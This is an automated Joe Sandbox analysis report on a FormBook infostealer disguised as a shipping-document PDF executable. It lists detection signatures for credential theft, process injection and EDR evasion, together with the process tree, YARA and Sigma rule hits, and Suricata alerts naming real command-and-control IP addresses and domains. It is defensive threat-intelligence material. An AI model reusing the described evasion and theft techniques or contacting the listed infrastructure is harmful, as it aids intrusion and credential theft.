Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHIPPING DOCUMENTS_PDF.exe

Overview

General Information

Sample name:SHIPPING DOCUMENTS_PDF.exe
Analysis ID:1573434
MD5:8a85446ebb8eb07a56672afa7c1b7fbc
SHA1:bc089650b78a7ebd5210ab0ae9609df50497a9d3
SHA256:dfd126e677ab29f2de7b5305b3fcf75d096f2a1f69f79b6513136be7965f73f7
Tags:exeuser-mamrmtsh
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SHIPPING DOCUMENTS_PDF.exe (PID: 5668 cmdline: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe" MD5: 8A85446EBB8EB07A56672AFA7C1B7FBC)
    • svchost.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pNkvbgLNQpIoyz.exe (PID: 5068 cmdline: "C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • waitfor.exe (PID: 2800 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • pNkvbgLNQpIoyz.exe (PID: 5884 cmdline: "C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.4b0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.4b0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe, ParentProcessId: 5668, ParentProcessName: SHIPPING DOCUMENTS_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ProcessId: 6688, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe, ParentProcessId: 5668, ParentProcessName: SHIPPING DOCUMENTS_PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe", ProcessId: 6688, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T00:18:31.734026+010028554651A Network Trojan was detected192.168.2.5497403.33.130.19080TCP
                2024-12-12T00:18:56.671115+010028554651A Network Trojan was detected192.168.2.549795161.97.142.14480TCP
                2024-12-12T00:19:11.739098+010028554651A Network Trojan was detected192.168.2.54983484.32.84.3280TCP
                2024-12-12T00:19:27.352460+010028554651A Network Trojan was detected192.168.2.549873124.71.162.2180TCP
                2024-12-12T00:19:42.778154+010028554651A Network Trojan was detected192.168.2.549911150.109.11.24780TCP
                2024-12-12T00:19:58.045150+010028554651A Network Trojan was detected192.168.2.549951173.208.249.15580TCP
                2024-12-12T00:20:12.985064+010028554651A Network Trojan was detected192.168.2.549986209.74.79.4280TCP
                2024-12-12T00:20:29.047423+010028554651A Network Trojan was detected192.168.2.55000418.139.62.22680TCP
                2024-12-12T00:20:44.566392+010028554651A Network Trojan was detected192.168.2.550008101.32.205.6180TCP
                2024-12-12T00:21:02.186163+010028554651A Network Trojan was detected192.168.2.55001238.6.78.23580TCP
                2024-12-12T00:21:17.158405+010028554651A Network Trojan was detected192.168.2.5500163.125.36.17580TCP
                2024-12-12T00:22:10.730053+010028554651A Network Trojan was detected192.168.2.550020172.67.176.24080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T00:18:48.956793+010028554641A Network Trojan was detected192.168.2.549776161.97.142.14480TCP
                2024-12-12T00:18:51.613514+010028554641A Network Trojan was detected192.168.2.549782161.97.142.14480TCP
                2024-12-12T00:18:54.046754+010028554641A Network Trojan was detected192.168.2.549789161.97.142.14480TCP
                2024-12-12T00:19:03.680032+010028554641A Network Trojan was detected192.168.2.54981184.32.84.3280TCP
                2024-12-12T00:19:06.350235+010028554641A Network Trojan was detected192.168.2.54981784.32.84.3280TCP
                2024-12-12T00:19:09.037215+010028554641A Network Trojan was detected192.168.2.54982484.32.84.3280TCP
                2024-12-12T00:19:19.281036+010028554641A Network Trojan was detected192.168.2.549850124.71.162.2180TCP
                2024-12-12T00:19:22.002152+010028554641A Network Trojan was detected192.168.2.549856124.71.162.2180TCP
                2024-12-12T00:19:24.709648+010028554641A Network Trojan was detected192.168.2.549864124.71.162.2180TCP
                2024-12-12T00:19:34.784764+010028554641A Network Trojan was detected192.168.2.549889150.109.11.24780TCP
                2024-12-12T00:19:37.440962+010028554641A Network Trojan was detected192.168.2.549896150.109.11.24780TCP
                2024-12-12T00:19:40.097013+010028554641A Network Trojan was detected192.168.2.549902150.109.11.24780TCP
                2024-12-12T00:19:50.045715+010028554641A Network Trojan was detected192.168.2.549929173.208.249.15580TCP
                2024-12-12T00:19:52.710837+010028554641A Network Trojan was detected192.168.2.549935173.208.249.15580TCP
                2024-12-12T00:19:55.398864+010028554641A Network Trojan was detected192.168.2.549941173.208.249.15580TCP
                2024-12-12T00:20:04.998936+010028554641A Network Trojan was detected192.168.2.549967209.74.79.4280TCP
                2024-12-12T00:20:07.656869+010028554641A Network Trojan was detected192.168.2.549974209.74.79.4280TCP
                2024-12-12T00:20:10.574431+010028554641A Network Trojan was detected192.168.2.549980209.74.79.4280TCP
                2024-12-12T00:20:21.003076+010028554641A Network Trojan was detected192.168.2.55000118.139.62.22680TCP
                2024-12-12T00:20:23.660886+010028554641A Network Trojan was detected192.168.2.55000218.139.62.22680TCP
                2024-12-12T00:20:26.315495+010028554641A Network Trojan was detected192.168.2.55000318.139.62.22680TCP
                2024-12-12T00:20:36.572504+010028554641A Network Trojan was detected192.168.2.550005101.32.205.6180TCP
                2024-12-12T00:20:39.237742+010028554641A Network Trojan was detected192.168.2.550006101.32.205.6180TCP
                2024-12-12T00:20:41.893843+010028554641A Network Trojan was detected192.168.2.550007101.32.205.6180TCP
                2024-12-12T00:20:54.154006+010028554641A Network Trojan was detected192.168.2.55000938.6.78.23580TCP
                2024-12-12T00:20:56.845702+010028554641A Network Trojan was detected192.168.2.55001038.6.78.23580TCP
                2024-12-12T00:20:59.519970+010028554641A Network Trojan was detected192.168.2.55001138.6.78.23580TCP
                2024-12-12T00:21:09.175863+010028554641A Network Trojan was detected192.168.2.5500133.125.36.17580TCP
                2024-12-12T00:21:11.851422+010028554641A Network Trojan was detected192.168.2.5500143.125.36.17580TCP
                2024-12-12T00:21:14.495151+010028554641A Network Trojan was detected192.168.2.5500153.125.36.17580TCP
                2024-12-12T00:21:24.143527+010028554641A Network Trojan was detected192.168.2.550017172.67.176.24080TCP
                2024-12-12T00:21:26.799915+010028554641A Network Trojan was detected192.168.2.550018172.67.176.24080TCP
                2024-12-12T00:21:29.458673+010028554641A Network Trojan was detected192.168.2.550019172.67.176.24080TCP
                2024-12-12T00:22:18.180926+010028554641A Network Trojan was detected192.168.2.55002145.41.80.14480TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: SHIPPING DOCUMENTS_PDF.exeReversingLabs: Detection: 52%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4473308327.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4473351797.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4472444044.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248280939.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2249418016.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2248660468.0000000002970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4473260603.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SHIPPING DOCUMENTS_PDF.exeJoe Sandbox ML: detected
                Source: SHIPPING DOCUMENTS_PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: waitfor.pdbGCTL source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: waitfor.pdb source: svchost.exe, 00000002.00000003.2214923120.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, pNkvbgLNQpIoyz.exe, 00000003.00000002.4472898129.0000000001498000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pNkvbgLNQpIoyz.exe, 00000003.00000000.2170370235.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp, pNkvbgLNQpIoyz.exe, 00000006.00000002.4473119648.0000000000F6E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2030202293.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOCUMENTS_PDF.exe, 00000000.00000003.2029703617.0000000003530000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2152549878.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2153950004.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2248912135.000000000319E000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000005.00000003.2248057916.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000003.2250042141.0000000004A7A000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004C20000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000005.00000002.4473547371.0000000004DBE000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BB445A
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBC6D1 FindFirstFileW,FindClose,0_2_00BBC6D1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BBC75C
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBEF95
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BBF0F2
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBF3F3
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB37EF
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BB3B12
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BBBCBC
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 5_2_02C7C290 FindFirstFileW,FindNextFileW,FindClose,5_2_02C7C290
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then xor eax, eax5_2_02C69E40
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then pop edi5_2_02C6DF01
                Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then mov ebx, 00000004h5_2_04A104EF

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49776 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49795 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49789 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49824 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49817 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49856 -> 124.71.162.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49864 -> 124.71.162.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49782 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49811 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49896 -> 150.109.11.247:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49911 -> 150.109.11.247:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49929 -> 173.208.249.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49740 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49902 -> 150.109.11.247:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49941 -> 173.208.249.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49951 -> 173.208.249.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 173.208.249.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49967 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49834 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49850 -> 124.71.162.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 38.6.78.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 3.125.36.175:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 3.125.36.175:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.176.240:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 38.6.78.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 3.125.36.175:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49873 -> 124.71.162.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 3.125.36.175:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 38.6.78.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.176.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.176.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.176.240:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 45.41.80.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 101.32.205.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49889 -> 150.109.11.247:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 18.139.62.226:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 38.6.78.235:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.070001813.xyz
                Source: DNS query: www.growbamboo.xyz
                Source: Joe Sandbox ViewIP Address: 161.97.142.144 161.97.142.144
                Source: Joe Sandbox ViewIP Address: 172.67.176.240 172.67.176.240
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
                Source: Joe Sandbox ViewASN Name: WIIUS WIIUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exeCode function: 0_2_00BC22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BC22EE
